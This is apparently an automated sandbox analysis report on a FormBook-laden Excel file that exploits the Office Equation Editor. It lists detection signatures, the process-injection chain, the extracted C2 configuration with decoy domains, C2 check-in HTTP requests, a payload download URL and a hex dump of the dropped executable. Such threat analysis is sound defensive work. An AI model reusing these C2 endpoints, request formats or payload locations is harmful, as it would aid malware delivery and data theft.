Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ORDER CONFIRMATION.xlsx

Overview

General Information

Sample Name:ORDER CONFIRMATION.xlsx
Analysis ID:483668
MD5:e1e18c326feb4aea3a983f390e0e36c2
SHA1:7d0abdd1c61dac8dfb411fde050381149fa1aaff
SHA256:a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2808 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2976 cmdline: 'C:\Users\Public\vbc.exe' MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 836 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 2636 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • ipconfig.exe (PID: 1012 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
          • cmd.exe (PID: 2688 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hanlansmojitovillage.net/nthe/"], "decoy": ["omelhorcurso-online.com", "ttjk020.com", "urfavvpimp.com", "touchmytag.com", "allianzbersamamu.com", "menucoders.com", "goldmig.com", "optplm.com", "ramblersattic.com", "thehendrixcollection.com", "angelsmoonsexshop.com", "indianajones.club", "tageslinsen.info", "thscore2.com", "onpar-golf.com", "youcanaskmeto.review", "overseaexpert.com", "1977991.com", "eurolajd.com", "thefoxshack.com", "bubblelized.com", "texasvoterregistration.com", "denme.net", "sprtnet.com", "aedenpure.com", "yourdoor.pro", "oakridge-pm.com", "swoldiersnation.com", "com-security.center", "prostockbeisbol.com", "mailbroadcastdelivery.club", "fihglobal.com", "hiphopventuresllc.com", "ambrieclothing.com", "colorfulcreativeco.com", "mysahuarita.com", "gibadugi.com", "asoboawa.com", "requotation.com", "wolford.mobi", "ndfvkwnew.icu", "thaysay.net", "thaibinhgear.com", "minhscribe.com", "americanstonesusa.com", "dindigulvysya.com", "tomrings.com", "plasticplank.com", "societegenerol.com", "jrufexsh.com", "ujulus.club", "cpb.site", "bhfhf.com", "yamano-ue.com", "vivorelle.com", "groundedheavens.com", "realstyleworks.com", "vicdux.world", "kegeratorcollective.com", "gamemavn.com", "authorjameswshepherdonline.com", "kankanlol.com", "renatradingbv.com", "ponnyridning.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.212.143, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2808, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hanlansmojitovillage.net/nthe/"], "decoy": ["omelhorcurso-online.com", "ttjk020.com", "urfavvpimp.com", "touchmytag.com", "allianzbersamamu.com", "menucoders.com", "goldmig.com", "optplm.com", "ramblersattic.com", "thehendrixcollection.com", "angelsmoonsexshop.com", "indianajones.club", "tageslinsen.info", "thscore2.com", "onpar-golf.com", "youcanaskmeto.review", "overseaexpert.com", "1977991.com", "eurolajd.com", "thefoxshack.com", "bubblelized.com", "texasvoterregistration.com", "denme.net", "sprtnet.com", "aedenpure.com", "yourdoor.pro", "oakridge-pm.com", "swoldiersnation.com", "com-security.center", "prostockbeisbol.com", "mailbroadcastdelivery.club", "fihglobal.com", "hiphopventuresllc.com", "ambrieclothing.com", "colorfulcreativeco.com", "mysahuarita.com", "gibadugi.com", "asoboawa.com", "requotation.com", "wolford.mobi", "ndfvkwnew.icu", "thaysay.net", "thaibinhgear.com", "minhscribe.com", "americanstonesusa.com", "dindigulvysya.com", "tomrings.com", "plasticplank.com", "societegenerol.com", "jrufexsh.com", "ujulus.club", "cpb.site", "bhfhf.com", "yamano-ue.com", "vivorelle.com", "groundedheavens.com", "realstyleworks.com", "vicdux.world", "kegeratorcollective.com", "gamemavn.com", "authorjameswshepherdonline.com", "kankanlol.com", "renatradingbv.com", "ponnyridning.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: ORDER CONFIRMATION.xlsxVirustotal: Detection: 32%Perma Link
      Source: ORDER CONFIRMATION.xlsxReversingLabs: Detection: 29%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
      Antivirus detection for URL or domainShow sources
      Source: http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5PAvira URL Cloud: Label: malware
      Source: http://198.23.212.143/ddr/vbc.exeAvira URL Cloud: Label: malware
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
      Source: 8.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
      Source: global trafficDNS query: name: www.americanstonesusa.com
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
      Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.americanstonesusa.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
      Source: C:\Windows\explorer.exeDomain query: www.realstyleworks.com
      Source: C:\Windows\explorer.exeDomain query: www.plasticplank.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 192.99.131.252 80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.hanlansmojitovillage.net/nthe/
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 16:16:33 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 03:32:23 GMTETag: "87e00-5cc0058a7b386"Accept-Ranges: bytesContent-Length: 556544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 36 cf 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 08 00 00 08 00 00 00 00 00 00 ca 93 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 93 08 00 4f 00 00 00 00 a0 08 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 5c 93 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 73 08 00 00 20 00 00 00 74 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 a0 08 00 00 06 00 00 00 76 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 7c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 93 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 04 5f 01 00 03 00 00 00 6f 00 00 06 94 9e 01 00 c8 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 